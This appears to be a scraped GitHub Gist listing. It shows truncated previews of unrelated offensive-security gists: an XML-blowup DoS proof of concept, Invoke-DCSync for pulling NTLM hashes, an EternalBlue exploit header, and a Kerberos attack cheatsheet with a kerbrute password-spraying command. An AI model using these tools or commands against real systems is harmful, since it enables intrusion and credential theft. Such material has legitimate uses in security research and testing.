Stop! This text is only interesting for you if you...
- Like popping alerts in weird situations
- Miss CSS expressions as much as we do
- Have an unhealthy obsession for markup porn
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ################################################################################# | |
| # CVE-XXXXX Wordpress and Drupal XML Blowup Attack DoS# | |
| # Author: Nir Goldshlager - Salesforce.com Product Security Team# | |
| # This is a Proof of Concept Exploit, Please use responsibly.# | |
| ################################################################################# | |
| #!/usr/bin/env python | |
| from __future__ import print_function | |
| import threading | |
| import time | |
| import urllib |
tarasjg
/ emailip.py
Created
May 7, 2015 23:49
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import smtplib | |
| from email.mime.multipart import MIMEMultipart | |
| from email.mime.text import MIMEText | |
| from subprocess import check_output | |
| import datetime | |
| #Globals | |
| emailUsr = "" #sender email user name | |
| emailAddr = "" #sender email address | |
| emailPwd = "" #sender email password |
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-DCSync | |
| { | |
| <# | |
| .SYNOPSIS | |
| Uses dcsync from mimikatz to collect NTLM hashes from the domain. | |
| Author: @monoxgas | |
| Improved by: @harmj0y |
cure53
/ scriptlet.md
Last active
August 23, 2025 07:29
The Scriptless Scriptlet - Or how to execute JavaScript from CSS in MSIE11 without using Scripts
worawit
/ eternalblue7_exploit.py
Last active
January 26, 2026 15:44
Eternalblue exploit for Windows 7/2008
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # This file has no update anymore. Please see https://github.com/worawit/MS17-010 | |
| from impacket import smb | |
| from struct import pack | |
| import sys | |
| import socket | |
| ''' | |
| EternalBlue exploit for Windows 7/2008 by sleepya | |
| The exploit might FAIL and CRASH a target system (depended on what is overwritten) |
TarlogicSecurity
/ kerberos_attacks_cheatsheet.md
Created
May 14, 2019 13:33
A cheatsheet with commands that can be used to perform kerberos attacks
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
OlderNewer